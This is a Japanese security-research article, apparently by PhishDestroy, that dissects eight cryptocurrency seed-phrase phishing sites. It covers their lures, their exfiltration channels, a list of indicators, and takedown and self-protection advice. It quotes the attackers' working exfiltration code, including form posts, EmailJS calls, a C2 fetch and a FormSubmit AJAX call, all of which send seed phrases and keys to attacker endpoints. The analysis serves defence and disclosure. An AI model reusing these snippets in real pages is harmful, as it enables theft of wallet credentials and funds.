ニュースに戻る
徹底調査

暗号資産フィッシングの仕組み:
8つの実際の攻撃事例を徹底分析

我々は、フィッシング攻撃のリアルタイムトラフィックを傍受し、5つのシードフレーズ窃取ツールをリバースエンジニアリングし、盗まれたデータの行方をTelegramボット、EmailJSアカウント、およびPhishing-as-a-Serviceのバックエンドまで追跡した。

2026年3月27日 PhishDestroy リサーチ 読了時間:18分
暗号資産フィッシング調査の仕組み
傍受されたフィッシングトラフィックのリアルタイム分析により、攻撃インフラの全容が明らかになった
8分析対象サイト
7情報漏洩の手法
1,824+盗まれた認証情報
380+財布のブランド
$0アタッカーのコスト

調査結果

毎日、何千人もの仮想通貨ユーザーが、正規のウォレットサービスと見分けがつかないフィッシングサイトに騙され、資金を失っています。しかし、実際には何が起きているのでしょうか 後ろに 偽の「Connect Wallet」ボタン? シードフレーズは実際にはどこに保存されるのですか?

私たちは、稼働中の5つのフィッシングサイトからのリアルタイムのHTTPトラフィックを傍受し、それらのソースコードをすべてダウンロードした上で、データ流出のすべてのエンドポイントを最終的な行き先まで追跡しました。この調査により、シードフレーズを入力させるソーシャルエンジニアリングの手口から、それをリアルタイムで攻撃者に送信するTelegramボットに至るまで、現代の暗号資産フィッシングの全容が明らかになりました。

免責事項

この記事に掲載されているシードフレーズはすべて、ランダムに生成されたテストデータです。本調査の過程で、実際の認証情報が漏洩した事実はありません。すべてのサイトについては、それぞれのホスティングプロバイダーおよび不正利用対策部門に通報済みです。

普遍的な攻撃パターン

ブランディングやバックエンドは異なるものの、8つのフィッシングサイトはすべて以下の まったく同じ心理的ファネル:

ランディングページ信頼関係の構築
ウォレットセレクター60~110個以上のロゴ
偽の「接続中...」3~5秒のタイマー
「接続に失敗しました」いつも失敗する
手動入力シード / キー / キーストア
情報流出TG / メール / API

重要なポイント:「接続中...」のアニメーションは常に 失敗するようにハードコーディングされている. サイト#4のソースコードを調べてみると、次のような記述が見つかりました。 const success = false — ウォレットへの接続は試みられていません。この一連の流れは、被害者を「手動で接続」フォームへと誘導することのみを目的としています。

6段階からなる暗号資産フィッシング攻撃の連鎖
我々が分析したすべてのフィッシングサイトに共通する、6段階からなる普遍的な攻撃チェーン

8つのサイト:詳細な内訳

1
ネットワーク層プロトコル
networklayers.pages.dev
ライブCloudflare PagesTelegramボット + EmailJS

なりすまし

ウォレットの検証を目的とした架空の「分散型プロトコル」。信頼性を高めるため、CryptoCompareのリアルタイム価格ティッカーや、実際のブロックチェーンエクスプローラー(イーサリアム、BSC、ポリゴン、アバランチ、ソラナ、カルダノ)へのリンクを採用しています。 ランディングページには100以上のウォレットロゴと、3ステップの「検証」プロセスが掲載されています。

二重の流出経路

5つの中で最も洗練されたバックエンド――盗まれた認証情報はすべて、ここを経由して送信される 2つの独立したチャンネル 同時に:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

OSINTによる調査結果

指標
詐欺メールBestgrace309@gmail.com
Telegramボット@DewdropsTG_bot (ID: 7567323692)
Telegramの受信者@metatech2 (チャットID: 7350941887)
バックエンドemailjs-backend-ovtg.onrender.com
EmailJS サービスservice_d5qigxs / template_7bqxeaa
隠された領域layerschain.in(CFのメール難読化によるもの)
送信済みメッセージ1,824+(TelegramのメッセージIDより)
ドメインの開設期間2日間(TLS:2026年3月25日)
OPSECの不備

攻撃者のメールアドレスは、ある JavaScriptのコメント 内部 config.js: // Bestgrace309@gmail.com。彼らはデプロイする前にそれを削除するのを忘れていました。さらに、Telegramのリレーバックエンドは完全にオープンな状態で、認証もレート制限もありません。Cloudflareの data-cfemail HTML内の難読化処理に加え、隠されたメールアドレスも発見しました: support@layerschain.in、インドおよび南アフリカのホスティングインフラに接続しています。

2
AQLA トークンの移行
token-aqla.pages.dev
ライブCloudflare Pages非静的フォーム

なりすまし

現実をピクセル単位で忠実に再現したスクレイピング アクアリブレ(AQLA) トークンの移行ページ。そのHTMLには、ソースを明らかにするメタデータタグが含まれています: data-scrapbook-source="https://token.aqla.app/migration"、2024年11月19日のタイムスタンプ付き。

ゼロコード・アプローチ

この攻撃者には以下が必要です サーバーサイドのコードが一切ない. この フォームは、直接 非静的 — 静的サイト向けの正規のフォームバックエンド。すべての 送信データは、詐欺師のメールアドレスに転送される。攻撃者の メールアドレスは ソースコードには決して表示されない.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
価格:0ドル

Cloudflare Pages:無料。Un-static Forms:無料。ドメインの 購入なし。サーバーのレンタルなし。インフラコスト合計: ゼロドル.

3
SafePal タイポスクワット
antiresolve-mysafpalnode.pages.dev
ライブ Cloudflare Pages 非静的フォーム

なりすまし

このサブドメインには「」が含まれていますsafpal" — a 意図的なスペルミスである SafePal、 人気のあるハードウェアウォレットです。このサイトは「Blockchain Wallet Rectification」を装い、26の偽の問題カテゴリを掲載しています。Typed.jsを使用して チェーン名(イーサリアム、BSC、ポリゴンなど)をアニメーション表示し、 信頼性を高めるためにLiveCoinWatchのティッカーを採用しています。

同じキット、同じオペレーター?

を使用します。 まったく同じフィッシングのテンプレート サイト#2として: 同一 connect.html, 同一の wallets.html 60以上のロゴがあり、バックエンドはUn-staticと同じ(フォームIDが異なる — 6f1b82c3...da9943af)。この同一のキットは、強く示唆している 1人のオペレーターが両方のサイトを運営している.

コード内の誤り:「Privay Policy」(「c」が欠落)、「seperated」(「separated」が正しい)、「Kestore」(「y」が欠落)。パスワード入力欄では type="text" ~の代わりに type="password".

4
Flare Networkのクローン
flaremainnet.pages.dev
ライブCloudflare Pagesデュアル EmailJS(冗長化)

なりすまし

のほぼ完璧なクローンである フレア・ネットワーク portal — FTSOおよびData Connectorプロトコルを備えた、本格的なレイヤー1 EVMブロックチェーン。30以上のエコシステムパートナー、ナビゲーション、ブランディングを模倣している。ファビコンはタイポスクワットサイトから読み込まれている: portal.flaremainet.com (「mainnet」から「n」が1つ抜けています)。

EmailJSの二重化による冗長性

これを使用している唯一のサイトは 2つの別々のEmailJSアカウントを同時に利用 削除対策としての冗長性確保のため:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

盗難が発生するたびに送信されるメールの件名: "New Wallet Details from Flare".

これは資金調達済みの事業です

HTMLには以下の内容が含まれています Google タグ マネージャー (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), LunioのPPC保護機能、そして Twitter/X広告ピクセル. 攻撃者は以下を実行している 有料広告 被害者をフィッシングサイトに誘導し、ボットによるクリックをフィルタリングするためです。これは単なる趣味ではなく、分析ツールや広告費を投じた資金力のある組織的な活動なのです。

EmailJSと有料広告を併用したFlare Networkのフィッシングサイト
サイト #4:有料広告、分析トラッキング、二重のデータ流出 — 最もプロフェッショナルな作戦
5
COIN NODE / ウォレットの修正 (PhaaS)
swiftauthapps.pages.dev
バックエンドがダウンPulseResolve API(PhaaS)

なりすまし

汎用的な「COIN NODE」/「Wallet Fix」サービス(特定のブランド名なし)。著作権「Wallet Fix 2022」— このキットテンプレートは少なくとも4年前のものです。画像は以下にホストされています pumpeth.com (AWS上のWordPress)。

フィッシング・アズ・ア・サービス

最も懸念されるバックエンドアーキテクチャ:a UUID ベースのマルチテナント API:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

各詐欺師には、それぞれ固有のUUIDエンドポイントが割り当てられます。中央の運営者がAPIを管理し、キャンペーンを追跡し、場合によっては盗まれた資金の一部を搾取することもあります。これは 組織的な暗号資産窃盗 — 「フィッシング・アズ・ア・サービス(Phishing-as-a-Service)」モデル。

関連インフラ(ほぼ機能停止中)

ドメイン役割ステータス
api.pulseresolve.comエクスフィルトレーション APINXDOMAIN
walletissuesfix.netファビコンのホスティングサービスNXDOMAIN
syncwallet.onlineロゴホストNXDOMAIN
pumpeth.com画像CDN本番環境(AWS)
ゾンビ・フロントエンド

バックエンドは機能しなくなっていますが、その フロントエンドはまだ稼働中です Cloudflare Pages上で。攻撃者が再登録した場合、 pulseresolve.com, するとサイトは即座に再び稼働するようになります。

6
サポートセンター + レジャーの復元
wallet-support-39n.pages.dev および ledger-recovery.support
ライブCloudflare Pages + Replitカスタム C2 APIBIP39 オートコンプリート

なりすまし

A 二本柱の作戦: 一般的な「サポートセンター」は wallet-support-39n.pages.dev 15種類の偽の号外カテゴリと39の財布ブランドに加え、さらに ピクセルパーフェクトなLedgerオンボーディングのクローンledger-recovery.support Replit上でホストされており、デバイスモデルの選択、PINの設定、24語のシードフレーズグリッドが完備されており、 本物のBIP39オートコンプリート.

アンチスキャナー C2 バックエンド

このウォレットのサポートページは、盗まれたデータを api.uranustoken.org/log — Cloudflareの背後に配置された、カスタマイズされたnginx/Ubuntu C2。バックエンドは すべてのGETリクエストを意図的に破棄する (522タイムアウトを返す)、POSTリクエストにのみ応答する。つまり、URLスキャナーやGoogle Safe Browsingのクローラー、およびGETリクエストでエンドポイントにアクセスするセキュリティ研究者は何も検出できず、C2は機能停止しているように見える。

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

このLedgerクローンは、Replit上で独立したExpress.jsバックエンドを実行しています: POST /api/recovery-phrase 収集 {deviceId, pin, phrase}. これを返します 400 {"error":"Invalid data provided"} 不正な入力の場合 — バックエンドが 稼働中かつ積極的に検証中 盗まれたデータ。

OSINTによる調査結果

指標
フロントエンド(ウォレット)wallet-support-39n.pages.dev
フロントエンド(Ledger)ledger-recovery.support (34.111.179.208)
C2 バックエンド api.uranustoken.org → nginx/1.24.0 Ubuntu
C2 IPアドレス104.21.60.163 / 172.67.198.35 (Cloudflare)
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736
登録担当者Name.com (ledger-recovery.support)
展開済み2026年1月9日(Last-Modifiedヘッダー)
技術スタック React + Vite + Tailwind v4.1 + Framer Motion
最高のUX再現性

466 KBのJSバンドルには、以下のものが含まれています。 BIP39の完全なワードリスト リアルタイムのオートコンプリート機能では、「パスフレーズ」への言及が67件、「ニーモニック」への言及が39件確認された。このLedgerのクローンサイトは、本物のLedgerデバイスとまったく同じ初期設定フローを被害者に案内しており、今回の調査全体を通じて最も説得力のあるフィッシングページである。この apiKey 設定ファイルのこのフィールドは、次のようなことを示唆しています。 マルチテナント型 PaaS アーキテクチャ.

7
分散型ローンチパッド
mainnetvalidationapp.pages.dev
ライブCloudflare PagesFormSubmit.co

なりすまし

次のような機能を備えた汎用的な「分散型ローンチパッド」 21種類のエサ (ステーキング、移行、KYC、プレゼントキャンペーン、報酬の受け取り、資産の回復、プレセール、NFTの鋳造、ロックされたアカウント…)および 70以上の財布ブランド — 私たちがこれまで目にした中で最も網羅的なウォレット一覧の一つだ。しかし、「Sychronize」(「n」が抜けている)という明らかな誤字が、これが偽物であることを露呈している。

FormSubmit Pipeline

用途 FormSubmit.co — 正規のフォームからメールへの送信サービス。エンドポイントのハッシュ a2cf4131f1a5d39453c7c183df96f86f これは、詐欺師のメールアドレスのMD5ハッシュです。私たちは、Gmail、Yahoo、Hotmail、ProtonMail、Yandex、Mail.ruのメールアドレスについて、何百ものパターンを総当たり攻撃で試しました―― 一致なし. 詐欺師は、あまり使われていないメールアドレスやランダムに生成されたメールアドレスを使用します。

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

OSINTによる調査結果

指標
ドメインmainnetvalidationapp.pages.dev
フォーム送信時のハッシュa2cf4131f1a5d39453c7c183df96f86f
キャンペーンIDDAPP 分散型
FontAwesome Kitbdc3291137(キット番号 112310842、無料版 v6.7.2)
jQuery3.2.1 と 3.5.1 が同時に読み込まれた
ブートストラップCSS 5.2.2 + JS 5.3.0-alpha1(バージョン不一致)
2つの持ち手

FontAwesome Kit bdc3291137 — FontAwesomeは、このキットIDの所有者を特定できます。キャンペーンタグ DAPP DECENTRALIZED 同じFormSubmitハッシュを使用している他のフィッシングサイトにも表示される可能性があります。シードフレーズを盗んだ後、 偽のQRコードとランダムな7文字の参照コード 「固有の参照コードを管理者に連絡してください」というメッセージが表示される――調査を行う代わりに、被害者を待たせている。

8
自宅のパソコンでの R2 Bucket + PHP
pub-519769e9eb634616b1746c2018641d56.r2.dev
死んだCloudflare R2PHP + DDNS

なりすまし

不明 — フロントエンドとバックエンドの両方がオフラインになっている。ペイロードの構造から判断すると、これは暗号資産ウォレットのシードフレーズを盗み出すものだった。その Cloudflare R2 パブリックバケット (Pagesではなく、オブジェクトストレージ)は、 十分に実証されているフィッシングの手口 Netskopeの報告によると、5,000件以上の悪意のあるページが特定され、トラフィックは61倍に増加した。

スクリプトキディの環境構築

最も 基本演算 このコレクションでは。シードフレーズは送信されます 一語ずつ 無料のダイナミックDNSを経由して、自宅のパソコンやVPS上で実行されているPHPスクリプトへ:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

OSINTによる調査結果

指標
フロントエンド pub-519769e9eb634616b1746c2018641d56.r2.dev [オフライン]
バックエンド mercifuljigga4real123.publicvm.com [NXDOMAIN]
R2 バケット ID519769e9eb634616b1746c2018641d56
DDNSプロバイダー DNSExit.com / Netdorm, Inc.(オハイオ州シンシナティ)
DNS NSns10–13.dnsexit.com
ユーザー名mercifuljigga4real123
OSINTのユーザー名:mercifuljigga4real123

「Merciful」+「jigga」(ジェイ・Zの愛称)+「4real」+「123」――ヒップホップ文化への親和性をうかがわせる、極めて個性的なハンドルネームだ。 見つかりませんでした GitHub、X、Instagram、TikTok、Reddit、YouTube、Twitch、Steamなど、インデックス登録されているあらゆるプラットフォーム上で。Discord、Telegram、あるいはゲームプラットフォーム上で、この名前またはそれに近い名前で活動している可能性が高い。ファイル名は fuc.php そのハンドルの型破りなスタイルにぴったりだ。

シードフレーズを盗まれる7つの手口

4つの暗号資産フィッシングによるデータ流出手法の比較
8つのフィッシングサイトで使用されていた7つの異なる情報流出アーキテクチャ
方法サイト仕組み速度費用
Telegramボット#1 Render.com上のExpress.jsはBot APIへのプロキシとして機能します。詐欺師は、認証情報を記載したダイレクトメッセージを即座に受け取ります。 リアルタイム$0
EmailJS#1, #4 クライアントサイドのJavaScriptは、EmailJS APIに直接送信し、それが詐欺師のメールアドレスに配信されます。 約1分$0
非静的フォーム#2, #3 送信内容を電子メールで転送する正規のフォームサービスへの、標準的なHTMLフォームのPOSTリクエスト。 約1分$0
FormSubmit.co#7 jQuery AJAX から FormSubmit.co へ。メールアドレスは MD5 ハッシュで隠されています。キャンペーンのタグは「DAPP DECENTRALIZED」です。 約1分$0
カスタム C2 API#6 React SPAは、Cloudflareの背後にあるnginx/Express APIにリクエストを送信します。 GETリクエストを破棄する (522) スキャナーを回避するため。POST メソッドにのみ応答する。 リアルタイム月額約5ドル
PHP + DDNS#8 自宅のパソコン上のPHPスクリプトを、無料のダイナミックDNS(publicvm.com)経由で実行。シードフレーズを単語ごとに送信。 リアルタイム$0
PhaaS API#5 UUID ベースのマルチテナント API。中央のオペレーターがバックエンドを管理し、詐欺師たちがエンドポイントを借りる仕組み。 リアルタイム不明

あらゆるフィッシングサイトを見抜く7つの危険信号

もし見かけたら いずれか 以下の場合は、直ちにタブを閉じてください:

1. 「接続に失敗しました」というメッセージは常に偽物である

正規のウォレット接続では、WalletConnectプロトコルまたはブラウザ拡張機能を使用します。シードフレーズを入力するよう求める「接続に失敗しました」というエラーが表示されることは決してありません。

2. 50~110個以上のウォレットロゴ、1つの集約先

どのウォレットアイコンをクリックしても、同じフォームが表示されます。本格的なサービスであれば、各ウォレットの実際のSDKを統合しているはずです。

3. 送信後に「エラー」と表示される

送信後に表示される偽の「503エラー」や「不明なエラー」は、意図的なものです。あなたのデータはすでに盗まれています。このエラーは、別のウォレットを使って再送信させようとする罠なのです。

4. .pages.dev でホストされています

これら5つのサイトはすべて、Cloudflare Pagesの無料プランを悪用しています。本人確認は不要です。2025年、Cloudflare Pagesを利用したフィッシング攻撃の悪用件数は198%増加しました。

5. 3つのタブ:「フレーズ」「秘密鍵」「キーストア」

正当なサービスで、これら3種類の認証情報をすべて必要とするものはありません。この3つのタブがあるフォームは、フィッシングキットの典型的な特徴です。

6. ブロックチェーンとの連携なし

これらのサイトはどれも読み込まれません ethers.js, web3.js、あるいはRPC呼び出しを行うこともありません。これらは、dAppを装った純粋なHTMLフォームに過ぎません。

7. コストゼロのインフラ

無料ホスティング+無料フォームサービス+無料メッセージング=0ドルで完結するフィッシング詐欺の手口。サイトに正規のドメインがない場合は、疑ってかかるべきだ。

IOCの全順位表

セキュリティチーム、脅威インテリジェンスプラットフォーム、および不正利用の報告を行う方々へ:

ドメインとインフラストラクチャ

ドメイン種類ステータス
networklayers.pages.devフィッシングのフロントエンドライブ
token-aqla.pages.devフィッシングのフロントエンドライブ
antiresolve-mysafpalnode.pages.devフィッシングのフロントエンドライブ
flaremainnet.pages.devフィッシングのフロントエンドライブ
swiftauthapps.pages.devフィッシングのフロントエンドライブ
emailjs-backend-ovtg.onrender.comTGリレーのバックエンドライブ
portal.flaremainet.comタイポスクワット資産不明
layerschain.in関連ドメインDNSがダウンしている
api.pulseresolve.comPhaaSのバックエンドNXDOMAIN
walletissuesfix.netアセットホストNXDOMAIN
syncwallet.onlineロゴホストNXDOMAIN
pumpeth.com画像CDN本番環境(AWS)
wallet-support-39n.pages.devフィッシングのフロントエンドライブ
ledger-recovery.supportLedgerフィッシング(Replit)ライブ
api.uranustoken.orgC2バックエンド(nginx/Ubuntu)ライブ
uranustoken.orgルートドメイン404
mainnetvalidationapp.pages.devフィッシングのフロントエンドライブ
pub-519769e9eb634616b1746c2018641d56.r2.devフィッシング(R2バケット)オフライン
mercifuljigga4real123.publicvm.comPHPバックエンド(DDNS)NXDOMAIN

アカウントと識別子

種類サイト
メールBestgrace309@gmail.com#1
メールアドレス(非表示)support@layerschain.in#1
Telegramボット@DewdropsTG_bot (7567323692)#1
Telegramユーザー@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
非静的フォームc78173e2d991...94c3f76#2
非静的フォーム6f1b82c3ce55...da9943af#3
PhaaS UUIDa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MSクラリティj4bllybjkp#4
インスタンスのレンダリングrndr-id: ed83576e-b1b3-4c82#1
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736#6
FormSubmit MD5a2cf4131f1a5d39453c7c183df96f86f#7
キャンペーンタグDAPP 分散型#7
FontAwesome Kitbdc3291137(キット番号 #112310842)#7
R2 バケット ID519769e9eb634616b1746c2018641d56#8
ユーザー名/DDNSmercifuljigga4real123#8

仮想通貨フィッシングの被害はどこに報告すればよいか

仮想通貨フィッシングサイトをどこに通報すべきか — マルチベクターによるテイクダウン
ホスティング、バックエンドサービス、メッセージングプラットフォームを同時に標的とし、テイクダウンのスピードを最大化
サービス報告すべき事項方法
Cloudflare.pages.dev 7つ + R2 バケット 1つabuse.cloudflare.com
Google Safe BrowsingすべてのフィッシングURLフィッシングを報告する
PhishTankコミュニティのブロックリストに関するすべてのURLphishtank.org
EmailJS不正利用されたアカウント3件(上記のサービスID)abuse@emailjs.com
非静的2つのエンドポイントun-static.com 経由でのお問い合わせ
Render.comTelegramリレーのバックエンド不正利用報告フォームを表示する
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
Google(Gmail)Bestgrace309@gmail.comGoogleの不正利用報告
Twitter/Xサイト#4を宣伝する広告アカウントXの広告に関する不正利用の報告
FormSubmit.coハッシュ a2cf4131... (#7)フォーム送信 不正利用報告フォーム
Replitledger-recovery.support (#6)Replit への不正利用報告
Name.comledger-recovery.support のレジストラName.com への不正利用
DNSExitmercifuljigga4real123.publicvm.comdnsexit.com への不正利用
FontAwesomeキット bdc3291137 (#7)FontAwesomeの不正利用
Chainabuseすべてのフィッシング攻撃Chainabuse.com

身を守る方法

黄金律

正当なサービスであれば、ウェブサイト上でシードフレーズを入力するよう求めることは決してありません。 シードフレーズは、ウォレットの復元時のみ、公式のウォレットソフトウェアに入力してください。サードパーティの「検証」「同期」「復元」サイトでは、決して入力しないでください。

ウォレットを接続する前に:

  • URLが公式ドメインと一致していることを確認してください。SSL証明書の詳細も確認してください。
  • 本物のWalletConnectはQRコードまたはディープリンクを使用しており、シードフレーズ形式は一切使用しません。
  • 「接続に失敗しました」というメッセージが表示され、手動で認証情報を入力するよう求められた場合は、フィッシング詐欺です。
  • 不審なURLは以下で確認してください PhishTank または VirusTotal やり取りをする前に。
  • ハードウェアウォレットを使用しましょう。このウォレットでは、取引のたびに物理的な確認が必要です。
  • 公式のURLをブックマークしてください。広告やDM、ソーシャルメディア上のリンクは絶対にクリックしないでください。

暗号資産フィッシングの分類

シードフレーズ窃取型は、その一例に過ぎません。ここでは、暗号資産フィッシングの全体像をご紹介します。今後、各タイプについて詳しく掘り下げていく予定です。

シードフレーズ窃取者
リカバリーフレーズを入力させるように仕向ける偽の「Connect Wallet」ページ。本記事の焦点――5つの実例を徹底分析。
前述の通り
承認の乗っ取り
MetaMaskを通じて無制限のトークン承認を要求する悪意のあるdApp。一度承認されると、攻撃者はシードフレーズを必要とせずに、ユーザーのウォレットから資金をすべて奪い取ります。
近日公開
アイスフィッシング(Permit2)
EIP-2612の「ガス不要の許可」の脆弱性を悪用する。被害者は、トークンの転送権限を付与するオフチェーンメッセージに署名する。トークンが流用されるまで、オンチェーンでの承認は確認できない。
近日公開
偽のエアドロップに関する主張
悪意のあるスマートコントラクトを介して「請求」を行うことを要求する、偽のトークンエアドロップ。この請求トランザクションにより、実際にはユーザーの実際のトークンが外部に送金されてしまう。
近日公開
クリップボードハイジャッカー
クリップボードを監視し、ユーザーが貼り付ける前に、コピーされたウォレットアドレスを攻撃者のアドレスに密かに置き換えるマルウェア。
近日公開
ほこり + 中毒
類似したアドレスからの微小な取引が、取引履歴を乱雑にしてしまいます。被害者は、次の送金を行う際に、取引履歴からその偽のアドレスをコピーしてしまいます。
近日公開

居心地の悪い真実

仮想通貨フィッシング詐欺の立ち上げにかかる費用 $0 そして、 30分未満. 無料ホスティング、フリーフォームサービス、無料メッセージングボット。サイト#1の背後にいる攻撃者は、すでに 1,824人以上の犠牲者. サイト#4は稼働中 有料広告 規模を拡大して。これは素人ごっこなんかじゃない――これは一大産業なのだ。唯一の防御策は、事態を認識することだ。

私たちと一緒に立ち向かいましょう

PhishDestroyは、仮想通貨関連のフィッシングサイトをリアルタイムで追跡・報告しています。不審なサイトを見つけた場合は、ぜひ当サイトまでご報告ください。調査を行い、そのサイトの削除に向けて取り組みます。

関連する調査

調査
xmrwallet.comの終焉:NameSiloはMの窃盗犯を庇うために嘘をついた
10年にわたるモネロの盗難。3つのレジストラが関与。NameSiloは7つの嘘をでっち上げた。
詳細解説
暗号資産窃取ネットワーク:そのインフラの実態
「ドレイナー・アズ・ア・サービス」事業におけるインフラとオペレーターの共有方法。
パネルが露出した
Trust Wallet フィッシングパネル:管理者権限の完全なアクセス
私たちは、Trust Walletを標的としたフィッシング攻撃の管理画面にアクセスしました。
インフラ
詐欺のインフラが暴かれる:共有バックエンド
詐欺グループがサーバー、テンプレート、決済フローをどのように共有しているか。

この調査を共有する

X / Twitter Telegram Reddit LinkedIn

関連する調査

Trust Walletのフィッシング事件:23万9000ドルが盗まれ、6人の運営者が特定される
徹底調査
Trust Walletのフィッシング事件:23万9000ドルが盗まれ、6人の運営者が特定される
「Crypto Drainer」ツールキット:Angel Drainerの販売業者が暴露される
徹底調査
「Crypto Drainer」ツールキット:Angel Drainerの販売業者が暴露される
詐欺師の正体:4つの詐欺バックエンドを徹底解剖
調査
詐欺師の正体:4つの詐欺バックエンドを徹底解剖